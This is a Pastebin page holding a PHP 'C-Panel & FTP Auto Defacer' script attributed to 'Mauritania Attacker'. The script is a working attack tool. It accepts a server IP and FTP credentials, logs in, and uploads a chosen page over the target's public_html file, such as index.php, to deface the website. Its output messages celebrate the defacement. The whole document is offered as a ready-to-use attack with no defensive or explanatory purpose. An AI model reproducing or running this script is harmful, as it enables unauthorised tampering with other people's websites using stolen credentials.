Advertisement
Synchronizer

C-Panel & FTP Auto Defacer

Oct 3rd, 2014
374
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.41 KB | None | 0 0
  1. WWW.SYNCHRONIZER.TK >> FOR MORE TOOLS
  2. =======================================================================================================================================
  3. <?php
  4. @error_reporting(0);
  5. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Cpanel & Ftp Auto Defacer Coded By Mauritania Attacker</span></center>
  6. <br><center><img src="http://www6.0zz0.com/2014/08/20/15/449603437.png" /></center>';
  7. echo"<table width='100%' cellspacing='0' cellpadding='0' class='tb1' >
  8. <td width='100%' align=center valign='top' rowspan='1'><div class='hedr'>
  9. <td height='10' align='left' class='td1'></td></tr><tr><td
  10. width='100%' align='center' valign='top' rowspan='1'>
  11. <font color='red' face='comic sans ms' size='1'><b>
  12. <font color='RED' face='gothic' size='3'></font><br>
  13. <font color='white'></font>
  14. </table>";
  15.  
  16. echo"<body bgcolor=black><h6 style='text-align:center'><font color=white>
  17. <form method=post><font face=Tahoma size=2 color=#007700>
  18. Server ip : &nbsp;<input type=text name=hi value=ip>&nbsp;
  19. Username : &nbsp;<input type=text name=tx value=>&nbsp;
  20. Password : &nbsp;<input type=text name=p value=><br><br>
  21. file that you want to deface : </font><input type=text name=ph value='index.php'><br><br>
  22. <font face=Tahoma size=2 color=#009900>Deface page url --> </font><textarea class='area' rows='1' cols='75' name='deface' value='your daface page link'></textarea><br><br>
  23. <input type=submit name=sm value='Kill it Now' /><br>
  24. </form>";
  25.  
  26. if(isset($_POST['sm']))
  27. {
  28. $ip=trim($_POST['hi']);
  29. $u=trim($_POST['tx']);
  30. $p=trim($_POST['p']);
  31. $d=trim($_POST['ph']);
  32. $df=trim($_POST['deface']);
  33. echo "<br><font color=white size=2>";
  34. echo "<font color=red size=3>server ip ==></font>&nbsp".$ip;
  35. echo "<br><font color=red size=3>user ==></font> &nbsp".$u;
  36. echo "<br><font color=red size=3>password ==></font> &nbsp".$p;
  37. echo "<br><font color=red size=3>dirctory ==></font> &nbsp".$d;
  38. echo "<br><font color=red size=3>deface link ==></font><br>".$df."<br>";
  39. $dl="public_html/".$d;
  40. $si= ftp_connect($ip);
  41.  
  42. $try= ftp_login($si,$u,$p);
  43. if ((!$si) || (!$try))
  44. {
  45. echo "<br>could not connect , hope u filled out all correctly :(";
  46. exit;
  47. }
  48. else
  49. {
  50. echo "<br>connection done XD<br>Ghost ,its time to spin this shit<br>";
  51. }
  52. $deface = ftp_put($si, $dl , $df, FTP_BINARY);
  53. if ($deface)
  54. {
  55. echo "hell yeah page got defaced successfully >";
  56. }
  57. else
  58. {
  59. echo "Ghost try manually :(";
  60. }
  61. }
  62. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement